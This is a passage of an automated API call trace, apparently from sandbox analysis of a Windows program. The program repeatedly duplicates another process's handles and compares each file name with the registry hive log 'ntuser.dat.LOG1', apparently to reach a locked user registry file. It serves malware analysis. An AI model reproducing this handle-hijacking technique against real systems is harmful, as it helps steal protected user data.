returned 1 [0161.360] CloseHandle (hObject=0x1e8) returned 1 [0161.360] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.360] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.361] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.362] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.362] CloseHandle (hObject=0x1e4) returned 1 [0161.362] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.362] CloseHandle (hObject=0x194) returned 1 [0161.362] CloseHandle (hObject=0x1e8) returned 1 [0161.362] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.362] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.363] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.363] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.364] CloseHandle (hObject=0x1e4) returned 1 [0161.364] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.364] CloseHandle (hObject=0x194) returned 1 [0161.364] CloseHandle (hObject=0x1e8) returned 1 [0161.364] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.364] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.364] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.365] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.365] CloseHandle (hObject=0x1e4) returned 1 [0161.365] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.365] CloseHandle (hObject=0x194) returned 1 [0161.365] CloseHandle (hObject=0x1e8) returned 1 [0161.366] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.366] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.366] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.367] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.367] CloseHandle (hObject=0x1e4) returned 1 [0161.367] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.367] CloseHandle (hObject=0x194) returned 1 [0161.367] CloseHandle (hObject=0x1e8) returned 1 [0161.367] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.367] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.368] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.369] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.369] CloseHandle (hObject=0x1e4) returned 1 [0161.369] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.369] CloseHandle (hObject=0x194) returned 1 [0161.369] CloseHandle (hObject=0x1e8) returned 1 [0161.369] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.369] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.370] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.371] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.371] CloseHandle (hObject=0x1e4) returned 1 [0161.371] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.371] CloseHandle (hObject=0x194) returned 1 [0161.371] CloseHandle (hObject=0x1e8) returned 1 [0161.371] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.371] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.371] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.372] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.372] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.373] CloseHandle (hObject=0x1e4) returned 1 [0161.373] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.373] CloseHandle (hObject=0x194) returned 1 [0161.373] CloseHandle (hObject=0x1e8) returned 1 [0161.373] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.373] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.374] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.374] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.374] CloseHandle (hObject=0x1e4) returned 1 [0161.375] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.375] CloseHandle (hObject=0x194) returned 1 [0161.375] CloseHandle (hObject=0x1e8) returned 1 [0161.375] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.375] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.376] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.376] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.377] CloseHandle (hObject=0x1e4) returned 1 [0161.377] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.377] CloseHandle (hObject=0x194) returned 1 [0161.377] CloseHandle (hObject=0x1e8) returned 1 [0161.377] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.377] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.378] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.378] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.378] CloseHandle (hObject=0x1e4) returned 1 [0161.379] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.379] CloseHandle (hObject=0x194) returned 1 [0161.379] CloseHandle (hObject=0x1e8) returned 1 [0161.379] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.379] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.379] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.380] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.380] CloseHandle (hObject=0x1e4) returned 1 [0161.380] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.380] CloseHandle (hObject=0x194) returned 1 [0161.380] CloseHandle (hObject=0x1e8) returned 1 [0161.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.380] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.381] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.382] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.382] CloseHandle (hObject=0x1e4) returned 1 [0161.382] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.382] CloseHandle (hObject=0x194) returned 1 [0161.382] CloseHandle (hObject=0x1e8) returned 1 [0161.382] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.382] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.383] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.384] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.384] CloseHandle (hObject=0x1e4) returned 1 [0161.384] _wcsicmp (_Str1="\\User Pinned", _Str2="\\ntuser.dat.LOG1") returned 7 [0161.384] CloseHandle (hObject=0x194) returned 1 [0161.384] CloseHandle (hObject=0x1e8) returned 1 [0161.384] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.384] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.385] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.386] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.386] CloseHandle (hObject=0x1e4) returned 1 [0161.386] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.386] CloseHandle (hObject=0x194) returned 1 [0161.386] CloseHandle (hObject=0x1e8) returned 1 [0161.386] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.386] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x43c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.387] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.388] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.388] CloseHandle (hObject=0x1e4) returned 1 [0161.388] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.388] CloseHandle (hObject=0x194) returned 1 [0161.388] CloseHandle (hObject=0x1e8) returned 1 [0161.388] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.389] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.389] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.394] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.394] CloseHandle (hObject=0x1e4) returned 1 [0161.394] _wcsicmp (_Str1="\\Libraries", _Str2="\\ntuser.dat.LOG1") returned -2 [0161.394] CloseHandle (hObject=0x194) returned 1 [0161.394] CloseHandle (hObject=0x1e8) returned 1 [0161.394] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.394] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.395] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.396] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.396] CloseHandle (hObject=0x1e4) returned 1 [0161.396] _wcsicmp (_Str1="\\Libraries", _Str2="\\ntuser.dat.LOG1") returned -2 [0161.396] CloseHandle (hObject=0x194) returned 1 [0161.396] CloseHandle (hObject=0x1e8) returned 1 [0161.396] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.396] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.397] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.398] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.398] CloseHandle (hObject=0x1e4) returned 1 [0161.398] _wcsicmp (_Str1="\\User Pinned", _Str2="\\ntuser.dat.LOG1") returned 7 [0161.398] CloseHandle (hObject=0x194) returned 1 [0161.398] CloseHandle (hObject=0x1e8) returned 1 [0161.398] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.398] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.399] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.399] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.400] CloseHandle (hObject=0x1e4) returned 1 [0161.400] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.400] CloseHandle (hObject=0x194) returned 1 [0161.400] CloseHandle (hObject=0x1e8) returned 1 [0161.400] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.400] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.401] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.401] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.401] CloseHandle (hObject=0x1e4) returned 1 [0161.402] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.402] CloseHandle (hObject=0x194) returned 1 [0161.402] CloseHandle (hObject=0x1e8) returned 1 [0161.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.402] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.402] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.403] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.403] CloseHandle (hObject=0x1e4) returned 1 [0161.403] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.403] CloseHandle (hObject=0x194) returned 1 [0161.403] CloseHandle (hObject=0x1e8) returned 1 [0161.403] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.403] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.404] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.405] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.405] CloseHandle (hObject=0x1e4) returned 1 [0161.405] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.405] CloseHandle (hObject=0x194) returned 1 [0161.405] CloseHandle (hObject=0x1e8) returned 1 [0161.405] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.405] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x508, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.406] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.407] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.407] CloseHandle (hObject=0x1e4) returned 1 [0161.407] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.407] CloseHandle (hObject=0x194) returned 1 [0161.407] CloseHandle (hObject=0x1e8) returned 1 [0161.407] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.407] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.408] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.409] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.409] CloseHandle (hObject=0x1e4) returned 1 [0161.409] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.409] CloseHandle (hObject=0x194) returned 1 [0161.409] CloseHandle (hObject=0x1e8) returned 1 [0161.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.409] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.410] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.410] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.410] CloseHandle (hObject=0x1e4) returned 1 [0161.411] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.411] CloseHandle (hObject=0x194) returned 1 [0161.411] CloseHandle (hObject=0x1e8) returned 1 [0161.411] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.411] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.412] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.417] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.417] 